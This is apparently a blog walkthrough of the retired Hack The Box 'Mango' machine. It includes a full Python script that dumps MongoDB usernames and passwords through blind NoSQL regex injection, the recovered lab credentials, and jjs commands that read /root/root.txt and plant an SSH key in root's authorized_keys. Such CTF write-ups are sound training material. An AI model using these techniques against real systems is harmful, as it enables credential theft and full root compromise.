Hello guys mango is going to getting retired today and i have decided to release a write up on it. The box was rated to be a medium box and it had the IP address of 10.10.10.162. The name Mango was a great hint to anyone tackling the box since for the initial foothold you had to exploit Mongo database which was vulnerable to nosql injection and dump user credentials from the database then use those credential to ssh into the box. But there are two rabbitholes in this box that wasted much of my time in this box am gonna go through both of them and show you how i got out. Without much say lets jump in

As always we’ll begin off with an Nmap scan

We see there are 3 ports open ssh,http and https. Port 443(https) exposes the hostname of the box (staging-order.mango.htb). I added the hostname to my hosts file (/etc/hosts)

And navigated to the site using Mozilla both port 80 and port 443

Port 80 (http) is hosting a simple website that requires credentials to login

While port 443 is hosting a google like Web crawler that is used to search for informational. This was my first rabbithole. I was trying for a long time to dump credentials from the database using this search bar but i was unsuccessful

So i decided to focus my attention on port 80 which contained the login page. My first approach was to try and bypass the authentication mechanism and that was pretty straightforward i just used burpsuite and some nosql injection payloads

By adding [$ne] before the username and password we get a 302 Found which directs us to the the homepage of the website this was the second rabbithole

The page had nothing but the information presented above. After much thought i decided to see if there was a way that i could dump user credentials the same way sqlmap does dump credentials from the database

I found the following script modified it a little bit to my liking and ran it.

Here’s the python script script

###########################################

import requests
import string

url = “"
headers = {“Host”: “staging-order.mango.htb”}
cookies = {“PHPSESSID”: “jo7dctnivj75pdtnkrc2k910ji”}
possible_chars = list(string.ascii_letters) + list(string.digits) + [“\\”+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print(“Extracting password of “+username)
params = {“username”:username, “password[$regex]”:””, “login”: “login”}
password = “^”
while True:
for c in possible_chars:
params[“password[$regex]”] = password + c + “.*”
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print(“Found password “+password[1:].replace(“\\”, “”)+” for username “+username)
return password[1:].replace(“\\”, “”)

def get_usernames():
usernames = []
params = {“username[$regex]”:””, “password[$regex]”:”.*”, “login”: “login”}
for c in possible_chars:
username = “^” + c
params[“username[$regex]”] = username + “.*”
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print(“Found username starting with “+c)
while True:
for c2 in possible_chars:
params[“username[$regex]”] = username + c2 + “.*”
if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
username += c2
print(username)
break

if c2 == possible_chars[-1]:
print(“Found username: “+username[1:])
usernames.append(username[1:])
break
return usernames

for u in get_usernames():
get_password(u)

############################################

After about 20 minutes it was able to dump credentials of two user

  1. Admin with password :t9KcS3>!0B#2
  2. Mango with password : h3mXK8RhU~f{]f5H

I tried to ssh into the box using admins credentials and it didn’t work then tried to ssh using Mango’s credentials and voila !!! I had a shell in the box

I tried to escalate my privilege to admin user using the same credential and it worked.

Now it’s time to escalate out privileges to root

In the admin user directory there was a .jjshistory file the really looked odd . I decided to run linpeas since i did know what to do with file

We find that there is a high chance we can exploit jjs to get root ptiviledges.

JJS binary is also owned by root and user admin hence making it an exploit path

Using GTFOBins there is a way we can useto read file and also write file

1ST METHOD : Getting root flag using jjs

Bellow is the command that i used to obtain root flag in the box(The command bellow can be found in GTFOBins i’ve left the link above)

###########################################

var BufferedReader = Java.type(“java.io.BufferedReader”);
var FileReader = Java.type(“java.io.FileReader”);
var br = new BufferedReader(new FileReader(“/root/root.txt”));
while ((line = br.readLine()) != null) { print(line); };
exit()

###########################################

And voila !!!! we have the root flag

2ND METHOD: Uploading our very own generated ssh public key using the write function in jjs and using our own generated private key to ssh into the box as root

First we have to generate our own ssh keys

Then using the bellow jjs command upload our public key and saving it in .ssh root directory as authorized_keys

############################################

var FileWriter = Java.type(“java.io.FileWriter”);
var fw=new FileWriter(“/root/.ssh/authorized_keys”);
fw.write(“###YOUR OWN SSH PUBLIC KEY###”);
fw.close();

############################################

After uploading the public key, give the ssh private key proper permissions and using it to log into the box using ssh

And we are root now it is time to submit the flags and get the points

That was it for now guys till next time take care and if you liked the walkthrough you can clap for me down below

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(), ExploitDB()